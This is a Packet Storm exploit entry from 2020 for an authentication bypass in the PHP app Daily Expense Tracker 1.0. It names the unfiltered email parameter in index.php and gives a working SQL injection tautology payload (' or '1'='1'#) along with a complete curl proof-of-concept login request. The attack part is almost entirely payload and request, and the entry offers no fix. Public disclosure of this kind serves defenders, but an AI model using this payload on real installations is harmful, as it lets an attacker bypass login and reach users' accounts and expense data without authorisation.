Daily Expense Tracker 1.0 SQL Injection

2020-07-20T00:00:00
ID PACKETSTORM:158472
Type packetstorm
Reporter gh1mau
Modified 2020-07-20T00:00:00

Description

                                        
                                            `# Exploit Title: Daily Expense Tracker 1.0 - Authentication Bypass  
# Date: 2020-07-20  
# Exploit Author: gh1mau  
# Team Members: Capt'N,muzzo,chaos689 | https://h0fclanmalaysia.wordpress.com/  
# Vendor Homepage: https://phpgurukul.com/daily-expense-tracker-using-php-and-mysql/  
# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=10013  
# Version: V1.0  
# Tested on: PHP 5.6.18, Apache/2.4.18 (Win32), Ver 14.14 Distrib 5.7.11, for Win32 (AMD64)  
  
  
Vulnerable File:  
----------------   
/index.php  
  
  
Vulnerable Code:  
-----------------  
line 8: $email=$_POST['email'];  
  
  
Vulnerable Issue:  
-----------------  
$email=$_POST['email']; is not filtered correcty on the server side  
  
  
Payload:  
--------  
'email=saya%40saya.com' or '1'='1'#&password=1234&login=login'  
  
  
Sample POC Request:  
-------------------  
  
curl -i -s -k --location --request POST 'http://localhost/dets/' \  
--header 'Origin: http://localhost:88' \  
--header 'Cookie: PHPSESSID=dht4cn59hq6020vulephs36qr5' \  
--header 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' \  
--header 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36' \  
--header 'Referer: http://localhost:88/dets/' \  
--header 'Connection: close' \  
--header 'Sec-Fetch-Site: same-origin' \  
--header 'Sec-Fetch-Dest: document' \  
--header 'Host: localhost:88' \  
--header 'Accept-Encoding: gzip, deflate' \  
--header 'Sec-Fetch-Mode: navigate' \  
--header 'Cache-Control: max-age=0' \  
--header 'Upgrade-Insecure-Requests: 1' \  
--header 'Sec-Fetch-User: ?1' \  
--header 'Accept-Language: en-US,en;q=0.9' \  
--header 'Content-Length: 60' \  
--header 'Content-Type: application/x-www-form-urlencoded' \  
--data-raw 'email=saya%40saya.com' or '1'='1'#&password=1234&login=login'  
`